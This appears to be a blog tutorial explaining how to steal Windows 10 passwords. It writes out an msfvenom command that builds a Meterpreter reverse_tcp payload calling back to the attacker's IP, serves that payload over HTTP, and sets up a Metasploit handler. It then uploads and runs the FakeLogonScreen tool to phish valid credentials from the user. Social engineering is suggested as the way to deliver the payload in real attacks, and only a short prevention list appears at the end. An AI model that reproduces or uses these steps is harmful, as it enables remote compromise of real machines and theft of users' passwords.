How to Hack Windows 10 Password Using FakeLogonScreen in Kali Linux

This article demonstrates an in-depth guide on how to hack Windows 10 Passwords using FakeLogonScreen. Hacking Windows 10 password is an exciting topic and asked by many people on the group, so I decided to make this windows hacking tutorial.

I will use FakeLogonScreen and Kali Linux to hack Windows 10 passwords. FakelogonScreen is a handy and stealthy tool that creates a fake Log on-screen on a target machine running Windows 10. This tool enforces the target user to enter the correct credentials and, after getting it, passes it to the backdoor attacker.

Arris Huijgen developed this useful tool, it takes advantage of the normal behavior of the Windows environment, displaying the login screen when it comes out of sleep mode, and asking to enter credentials. At that time, this tool looked for phishing Windows credentials from the target, and the strength of this tool came in when it only accepts the valid credentials.

Steps to Hack Windows 10 Password

Now let’s try this tool and perform the exploit. We need to deploy two virtual machines i.e. Kali Linux and Windows 10. In my virtual lab environment, the Kali (attacking machine) has an IP: 192.168.0.103, and the Windows (target machine) got 192.168.0.100.

Download the FakeLogonScreen in Kali Linux

First, we need to download the FakeLogonScreen executable in our attacking machine from the link:

https://github.com/bitsadmin/fakelogonscreen/releases

Now assume the target machine is connected to the same network as the attacking machine.

Creating the Malicious Payload to Hack Windows

We will create a malicious payload by using msfvenom tool according to the information acquired by the target system. We will set lhost to our Kali’s IP i.e. 192.168.0.103, and set lport as 4444. Since we are interested in exploiting a Windows system, we will generate a payload as an executable file to easily gets it executed on the target machine. Use command:

# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.103 lport=4444 -f exe >> payload.exe

Creating the Malicious Payload to Hack WindowsHere the ‘payload.exe’ is the name of the generated payload. After that, we will run Python One-liner to create an HTTP server that will host this malicious payload at port 80 of the target machine.

#python -m SimpleHTTPServer 80

Creating the Malicious Payload to Hack Windows 2

Download the Payload on Target Machine

All set now, the most crucial stage came when we have to get the target to download this malicious payload. In real-life scenarios, an attacker can use different social engineering techniques and let the target user to download this malicious file into his system.

For practical demonstration, we will access our Kali’s machine directory from the Windows machine and download the payload.

Download the Payload on Target Machine

This will also be showing the current logs in our Kali machine.

Kali machine

Launch Metasploit to Exploit

Let’s get straight back to Kali and launch Metasploit-framework.

Use multi/handler module.

Use multi/handler module.Set the windows/meterpreter/reverse_tcp payload.

Set the windows meterpreter reverse_tcp payload.Set lhost as our IP i.e. 192.168.0.103 and lport as 4444

Set lhost as our IP i.e. 192.168.0.103 and lport as 4444After configuring it all, just run the exploit, go back to the Windows machine and run the executable, i.e., ‘payload.exe’. This will quickly get us a meterpreter session.

exploit

Upload the Executable

Now upload the FakeLogonScreen executable that we downloaded earlier. Make sure to give it the correct path of the exe file.

>upload /root/Downloads/FakeLogonScreen.exe

After that, get the shell access and run FakeLogonScreen.exe as showing below:

FakeLogonAnd BOOM!! At the target machine, all the running windows would get closed, and the logon screen would pop up, asking the credentials and appears it as a legitimate window. The user would not hesitate for a second to enter his credentials and get his work back.

target machine

To check the strength of this tool, we will be entering the wrong password.

passwordAnd this will show the error “The password is incorrect, try again.” This is the strength of FakeLogonScreen tool that enforces a target to enter his correct password. The user has no choice other than that to enter his password.

Let’s enter the correct password, and you will get your standard window as nothing happened before.

correct password

This also showing the FakeLogonScreen works similar to a keylogger. The attacker would easily monitor all the logs and could grab the correct password of the target user.

user

Some Useful Information

This tool could also work effectively on multiple desktop systems. While running it on various desktops, all the affected screens turn black immediately after executing the exploit from the attacking machine. This works even if the target user has set a customized background.

The zip file of the exploit also includes another executable named “FakeLogonScreenToFile.exe” that works the same as the previous executable. Still, it has some extra features i.e., not only showing the password but also stores it in a file %LOCALAPPDATA%\Microsoft\user.db.

This tool can also be integrated with Cobalt Strike to work effectively.

Preventions

  1. Make sure to verify every download source
  2. Beware of Phishing hunting from the unknowns
  3. Check all the links correctly on the Login Screen
  4. Change your passwords after some time

 

Irfan Shakeel
Irfan Shakeel, the founder of ehacking project, he also hosts cyber security training classes at EH Academy. He has discovered many vulnerabilities in the famous platforms (like Google, Dailymotion, Harvard University & etc.). He specializes in Network hacking, VoIP pentesting & digital forensics. He is the author of the book title “Hacking from Scratch”.

Most Popular

What is ethical hacking and how you can start?

The world is relying on the internet increasingly every day. Banking, e-commerce, social media, and all manner of government and industrial systems are now...

The Lies of VPN Service Providers

Privacy, anonymity, and security is the main concern for an online user. Many VPN service providers claim that their service helps the user protect...

4 Easy Ways To Help Your Startup Stand Out

There has not been a time in modern history more competitive for new businesses than now. In some ways, this is a very good...

Top Suggestions To Minimize Cyber Attack Risks

The Cyber Protection and Cyber Attack definition play an important role in maintaining both global security and operational productivity due to the rapid proliferation...

LOOKING FOR HACKING RECIPES FORM THE PRO?

Then sign up for FREE to the ehacking’s exclusive group. You will get the exclusive tips/tricks, tutorials, webinars & courses that I ONLY share with my fellow on this exclusive newsletter.